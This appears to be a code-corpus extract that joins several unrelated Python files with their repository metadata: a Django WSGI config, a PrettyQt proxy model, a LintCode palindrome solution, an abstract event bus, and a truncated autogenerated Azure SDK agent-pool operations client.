WSGI config for EBookReading project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'EBookReading.settings')
application = get_wsgi_application()
os.environ["DJANGO_ALLOW_ASYNC_UNSAFE"] = "true"
|
[
"chintan.acharya27@gmail.com"
] |
chintan.acharya27@gmail.com
|
28f6441efdadfc02cdae431872a2d080a5030079
|
f504253210cec1c4ec6c3ea50a45564db7d6cd7f
|
/prettyqt/core/transposeproxymodel.py
|
81174a1c4b71d3ea47ef74b62ff9f018ad7d81d7
|
[
"MIT"
] |
permissive
|
phil65/PrettyQt
|
b1150cb4dce982b9b8d62f38f56694959b720a3e
|
f00500d992d1befb0f2c2ae62fd2a8aafba7fd45
|
refs/heads/master
| 2023-08-30T21:00:08.905444
| 2023-08-17T12:24:45
| 2023-08-17T12:24:45
| 177,451,205
| 17
| 5
|
MIT
| 2020-08-15T22:21:18
| 2019-03-24T18:10:21
|
Python
|
UTF-8
|
Python
| false
| false
| 220
|
py
|
from __future__ import annotations
from prettyqt import core
class TransposeProxyModel(core.AbstractProxyModelMixin, core.QTransposeProxyModel):
"""This proxy transposes the source model."""
ID = "transpose"
|
[
"philipptemminghoff@googlemail.com"
] |
philipptemminghoff@googlemail.com
|
1b71200f5245e6bae920920c97bfa9306e71d00e
|
50aa9303450e06d1172f78c0478a58e5113d9bb9
|
/958palindrome-data-stream.py
|
affb066b625a80be4a626f58e58e577ff236cabd
|
[] |
no_license
|
zlldt/LintCode
|
6e1041b78a301651378833caf7fd7db9ce112ec5
|
e5012161131a8c8557bdb0296980b2a0b712c620
|
refs/heads/master
| 2021-06-27T05:24:08.471072
| 2019-03-02T12:56:26
| 2019-03-02T12:56:26
| 105,424,020
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 646
|
py
|
class Solution:
"""
@param s: The data stream
@return: Return the judgement stream
"""
def getStream(self, s):
# Write your code here
length = len(s)
result = [1 for x in range(length)]
dict ={}
for i in range(length):
if s[i] in dict:
dict[s[i]] += 1
else:
dict[s[i]] = 1
if len(dict)==1:
result[i] = 1
count = 0
for k,v in dict.items():
if v % 2 == 1:
count += 1
if count>1:
result[i] = 0
return result
|
[
"noreply@github.com"
] |
zlldt.noreply@github.com
|
b8c22bcb6d3ac5f046570154dacdc01b736d759f
|
b420377a638dc9a5d8c09ebc39b0448d47ddb74e
|
/ddd-todolist-sample/todolist/port/eventbus.py
|
5431f4676032719da1a48a8695071bda80b80f8a
|
[] |
no_license
|
shimakaze-git/drf-sample
|
d4e4e8e4d380f0b77e807d4bbf4e3f0d98ee6bcd
|
4294cd5adeea0ef51d3b7eee6a154d23dd089afc
|
refs/heads/master
| 2022-05-02T20:19:09.901257
| 2019-09-15T12:46:51
| 2019-09-15T12:46:51
| 205,698,781
| 0
| 0
| null | 2022-04-22T22:29:32
| 2019-09-01T15:52:14
|
Python
|
UTF-8
|
Python
| false
| false
| 263
|
py
|
from abc import ABCMeta, abstractmethod
class EventBus:
""" ドメインイベントの通知インタフェース. """
__metaclass__ = ABCMeta
@abstractmethod
def publish(self, event):
""" ドメインイベントを通知する. """
|
[
"shimakaze.soft+github@googlemail.com"
] |
shimakaze.soft+github@googlemail.com
|
1aafc1474a8d34a62593a043cd334f726f39f465
|
aa0270b351402e421631ebc8b51e528448302fab
|
/sdk/containerservice/azure-mgmt-containerservice/azure/mgmt/containerservice/v2022_07_01/aio/operations/_agent_pools_operations.py
|
2fcf53c41b2be850fca1b5ad7c12391ba7b15405
|
[
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
fangchen0601/azure-sdk-for-python
|
d04a22109d0ff8ff209c82e4154b7169b6cb2e53
|
c2e11d6682e368b2f062e714490d2de42e1fed36
|
refs/heads/master
| 2023-05-11T16:53:26.317418
| 2023-05-04T20:02:16
| 2023-05-04T20:02:16
| 300,440,803
| 0
| 0
|
MIT
| 2020-10-16T18:45:29
| 2020-10-01T22:27:56
| null |
UTF-8
|
Python
| false
| false
| 39,942
|
py
|
# pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, IO, Optional, TypeVar, Union, cast, overload
import urllib.parse
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._agent_pools_operations import (
build_create_or_update_request,
build_delete_request,
build_get_available_agent_pool_versions_request,
build_get_request,
build_get_upgrade_profile_request,
build_list_request,
build_upgrade_node_image_version_request,
)
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class AgentPoolsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.containerservice.v2022_07_01.aio.ContainerServiceClient`'s
:attr:`agent_pools` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list(self, resource_group_name: str, resource_name: str, **kwargs: Any) -> AsyncIterable["_models.AgentPool"]:
"""Gets a list of agent pools in the specified managed cluster.
Gets a list of agent pools in the specified managed cluster.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AgentPool or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.containerservice.v2022_07_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
cls: ClsType[_models.AgentPoolListResult] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("AgentPoolListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
list.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools"
}
@distributed_trace_async
async def get(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> _models.AgentPool:
"""Gets the specified managed cluster agent pool.
Gets the specified managed cluster agent pool.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPool or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2022_07_01.models.AgentPool
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
cls: ClsType[_models.AgentPool] = kwargs.pop("cls", None)
request = build_get_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"
}
async def _create_or_update_initial(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: Union[_models.AgentPool, IO],
**kwargs: Any
) -> _models.AgentPool:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.AgentPool] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(parameters, (IO, bytes)):
_content = parameters
else:
_json = self._serialize.body(parameters, "AgentPool")
request = build_create_or_update_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._create_or_update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize("AgentPool", pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {}) # type: ignore
return deserialized # type: ignore
_create_or_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"
}
@overload
async def begin_create_or_update(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: _models.AgentPool,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.AgentPool]:
"""Creates or updates an agent pool in the specified managed cluster.
Creates or updates an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:param parameters: The agent pool to create or update. Required.
:type parameters: ~azure.mgmt.containerservice.v2022_07_01.models.AgentPool
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2022_07_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_create_or_update(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.AgentPool]:
"""Creates or updates an agent pool in the specified managed cluster.
Creates or updates an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:param parameters: The agent pool to create or update. Required.
:type parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2022_07_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_create_or_update(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: Union[_models.AgentPool, IO],
**kwargs: Any
) -> AsyncLROPoller[_models.AgentPool]:
"""Creates or updates an agent pool in the specified managed cluster.
Creates or updates an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:param parameters: The agent pool to create or update. Is either a AgentPool type or a IO type.
Required.
:type parameters: ~azure.mgmt.containerservice.v2022_07_01.models.AgentPool or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2022_07_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.AgentPool] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
parameters=parameters,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_create_or_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"
}
async def _delete_initial( # pylint: disable=inconsistent-return-statements
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._delete_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"
}
@distributed_trace_async
async def begin_delete(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes an agent pool in the specified managed cluster.
Deletes an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._delete_initial( # type: ignore
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}"
}
@distributed_trace_async
async def get_upgrade_profile(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> _models.AgentPoolUpgradeProfile:
"""Gets the upgrade profile for an agent pool.
Gets the upgrade profile for an agent pool.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPoolUpgradeProfile or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2022_07_01.models.AgentPoolUpgradeProfile
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
cls: ClsType[_models.AgentPoolUpgradeProfile] = kwargs.pop("cls", None)
request = build_get_upgrade_profile_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_upgrade_profile.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("AgentPoolUpgradeProfile", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_upgrade_profile.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeProfiles/default"
}
@distributed_trace_async
async def get_available_agent_pool_versions(
self, resource_group_name: str, resource_name: str, **kwargs: Any
) -> _models.AgentPoolAvailableVersions:
"""Gets a list of supported Kubernetes versions for the specified agent pool.
See `supported Kubernetes versions
<https://docs.microsoft.com/azure/aks/supported-kubernetes-versions>`_ for more details about
the version lifecycle.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPoolAvailableVersions or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2022_07_01.models.AgentPoolAvailableVersions
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
cls: ClsType[_models.AgentPoolAvailableVersions] = kwargs.pop("cls", None)
request = build_get_available_agent_pool_versions_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_available_agent_pool_versions.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("AgentPoolAvailableVersions", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_available_agent_pool_versions.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/availableAgentPoolVersions"
}
async def _upgrade_node_image_version_initial(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> Optional[_models.AgentPool]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
cls: ClsType[Optional[_models.AgentPool]] = kwargs.pop("cls", None)
request = build_upgrade_node_image_version_request(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self._upgrade_node_image_version_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
response_headers = {}
if response.status_code == 202:
response_headers["Azure-AsyncOperation"] = self._deserialize(
"str", response.headers.get("Azure-AsyncOperation")
)
deserialized = self._deserialize("AgentPool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
_upgrade_node_image_version_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeNodeImageVersion"
}
@distributed_trace_async
async def begin_upgrade_node_image_version(
self, resource_group_name: str, resource_name: str, agent_pool_name: str, **kwargs: Any
) -> AsyncLROPoller[_models.AgentPool]:
"""Upgrades the node image version of an agent pool to the latest.
Upgrading the node image version of an agent pool applies the newest OS and runtime updates to
the nodes. AKS provides one new image per week with the latest updates. For more details on
node image versions, see: https://docs.microsoft.com/azure/aks/node-image-upgrade.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource. Required.
:type resource_name: str
:param agent_pool_name: The name of the agent pool. Required.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2022_07_01.models.AgentPool]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: str = kwargs.pop("api_version", _params.pop("api-version", "2022-07-01"))
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._upgrade_node_image_version_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
response_headers = {}
